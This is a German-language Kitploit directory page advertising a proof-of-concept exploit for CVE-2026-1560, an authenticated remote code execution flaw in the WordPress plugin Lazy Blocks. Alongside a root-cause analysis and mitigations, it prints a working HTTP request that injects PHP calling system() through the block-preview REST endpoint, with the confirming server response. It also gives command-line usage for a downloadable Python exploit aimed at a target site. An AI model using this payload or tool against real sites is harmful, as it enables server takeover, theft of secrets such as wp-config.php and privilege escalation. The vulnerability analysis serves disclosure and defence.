Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — Proof-of-concept-Exploit für CVE-2026-1560, eine authentifizierte Remote-Code-Execution-Schwachstelle im WordPress-Plugin Lazy Blocks, die es Benutzern mit niedrigen Berechtigungen ermöglicht, beliebigen PHP-Code über die REST-API auszuführen. | Kitploit
Tools/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

Proof-of-concept-Exploit für CVE-2026-1560, eine authentifizierte Remote-Code-Execution-Schwachstelle im WordPress-Plugin Lazy Blocks, die es Benutzern mit niedrigen Berechtigungen ermöglicht, beliebigen PHP-Code über die REST-API auszuführen.

Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1560 – Authentifizierte Remote-Codeausführung im Custom Block Builder – Lazy Blocks ≤ 4.2.0

Forscher: ZeYrOXxx

Plugin: Custom Block Builder – Lazy Blocks

Betroffene Versionen: ≤ 4.2.0

Schweregrad: Hoch

CVSS: 8.8

Schwachstellentyp: Authentifizierte Remote-Codeausführung (RCE)

Angriffsvektor: REST-API

Erforderliche Berechtigung: edit_posts (Contributor+)


Referenzen

  • Wordfence Advisory: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

Zusammenfassung

Eine schwerwiegende Sicherheitslücke wurde im Custom Block Builder – Lazy Blocks WordPress-Plugin identifiziert, die Versionen bis einschließlich 4.2.0 betrifft.
Die Schwachstelle ermöglicht es authentifizierten Benutzern mit niedrigen Berechtigungen (Contributor-Rolle), beliebigen PHP-Code auf dem Server über einen REST-API-Endpunkt auszuführen, der für die Blockvorschau-Funktion vorgesehen ist.

Dieses Problem bricht das WordPress-Berechtigungsmodell vollständig und kann zu einer führen.

vollständigen Kompromittierung des Servers

Verwundbarer Endpunkt

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

Der Endpunkt ist für jeden authentifizierten Benutzer mit der edit_posts-Fähigkeit zugänglich.


Technische Details

Berechtigungsprüfung

Die REST-Route ist mit einem schwachen Berechtigungs-Callback registriert:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

Dies schließt Contributors ein, denen niemals erlaubt sein sollte, PHP-Code auszuführen.


Verwundbarer Codepfad

REST-Controller – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

Block-Renderer – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

Die eval()-Funktion führt vom Angreifer kontrollierten PHP-Code ohne Bereinigung oder Validierung aus.


Ursachenanalyse

Lazy Blocks erlaubt benutzerdefinierte PHP-Rendering-Logik für Blöcke.
Der REST-API-Vorschau-Endpunkt akzeptiert benutzergelieferte Blockdefinitionen und unterscheidet nicht zwischen vertrauenswürdigen gespeicherten Blöcken und vom Angreifer kontrollierten Vorschau-Blöcken.

Durch das Injizieren abgeflachter Blockattribute wie:

  • code_output_method
  • code_editor_html

kann ein Angreifer die php_eval()-Ausführungssenke erreichen und beliebigen PHP-Code ausführen.


Proof of Concept (HTTP)

Anfrage:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

Antwort:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ Beliebige Befehlsausführung bestätigt


Dieses PoC wird ausschließlich für Sicherheitstests und Forschungszwecke bereitgestellt.


Auswirkungen

Ein Angreifer mit Contributor-Zugriff kann:

  • Beliebige Systembefehle ausführen
  • Sensible Dateien lesen (z. B. wp-config.php)
  • PHP-Quelldateien ändern
  • Berechtigungen auf Administrator erweitern
  • Die WordPress-Instanz vollständig kompromittieren

Abhilfemaßnahmen

  • PHP-Rendering nur auf Administratoren beschränken
  • Verwendung von eval() auf benutzergesteuerte Eingaben entfernen
  • REST-Vorschau von Blöcken mit PHP-Code verhindern
  • manage_options- oder unfiltered_html-Fähigkeit verlangen
  • PHP-Ausführung durch sichere Templating-Mechanismen ersetzen

Verwendung (Python-PoC)

Anforderungen

  • Python 3.x
  • requests-Bibliothek
  • Gültige WordPress-Anmeldedaten mit edit_posts-Fähigkeit (Contributor+)

Abhängigkeit installieren

root@kitploit:~
pip install requests

Den Exploit ausführen

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

Beispiel

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

Wenn das Ziel verwundbar ist, wird die Befehlsausgabe in der HTTP-Antwort zurückgegeben.

⚠️ Dieses Proof-of-Concept ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt.

Tool herunterladen